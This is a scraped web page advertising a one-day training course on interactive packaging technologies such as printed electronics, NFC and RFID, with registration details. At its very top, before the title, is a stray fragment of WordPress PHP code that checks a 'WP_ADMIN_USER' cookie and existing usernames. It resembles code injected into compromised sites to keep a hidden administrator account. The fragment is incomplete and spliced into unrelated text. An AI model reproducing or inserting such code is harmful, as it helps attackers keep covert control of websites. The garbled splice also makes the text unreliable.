if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Introduction to Interactive Packaging

Introduction to Interactive Packaging

Rapid innovation is happening that will enable products & everyday things of all types to ‘interact
in some way remotely with people or other products. New devices and processes ranging from:
smartphones and their ‘apps’ through 3D printing & nanotechnology to low cost Printed and Plastic
Electronics (PPE), are becoming available that can:

  • Create new visual effects: including static or moving and scrollable images
  • Produce a sound
  • Contain embedded data: for instant information; for validating the identity or location of a product or person;
  • Enable interfaces that can respond to touch, gestures or motion
  • Sense & report on an environment, temperature or condition
  • Release a chemical substance in a controlled way
  • Gather energy from the ‘air’ ….and much more

Smart ‘things’ will form extended data communications networks and lead to the much-vaunted longer term vision of every product having its own unique IP address and being accessed by other intelligent devices anywhere.  This is part of what has been dubbed the ‘Internet of Things’ (IOT).

A new generation of devices and communication protocols that sit alongside RFID is emerging; e.g. Near Field Communication (NFC), Ultra Wide Band (UWB), ZigBee, RuBee etc.  These promise to deliver real time information on location.

So what are YOU doing about it? This ‘hands-on’ one day course will provide delegates with a good basic grounding and appreciation of what technologies are available, their pros and cons, how they could work in combination, how they might devlop in future and help you decide which may or not be appropriate for your particlar products, whether that be food, tolietries or pharmaceuticals. Bring your packs along!

In particular it will help you to find answers to key questions such as:

  • What applications are other early adopters pursuing and why?
  • What technologies can I adopt now & what are the relative resource and cost implications for me?
  • Which technologies can be used alone or in combination to address my applications and how?
  • What are the relative time scales?
  • What development projects are worth engaging in now?

For further information on this course in easy to print PDF format please email: training@designcognition.com (inserting ‘Interactive Packaging PDF’ in the title).

To register for this event please Download the Registration Form

Alternatively phone +44 (0) 115 846 1914 now for more information.
Look forward to seeing you there!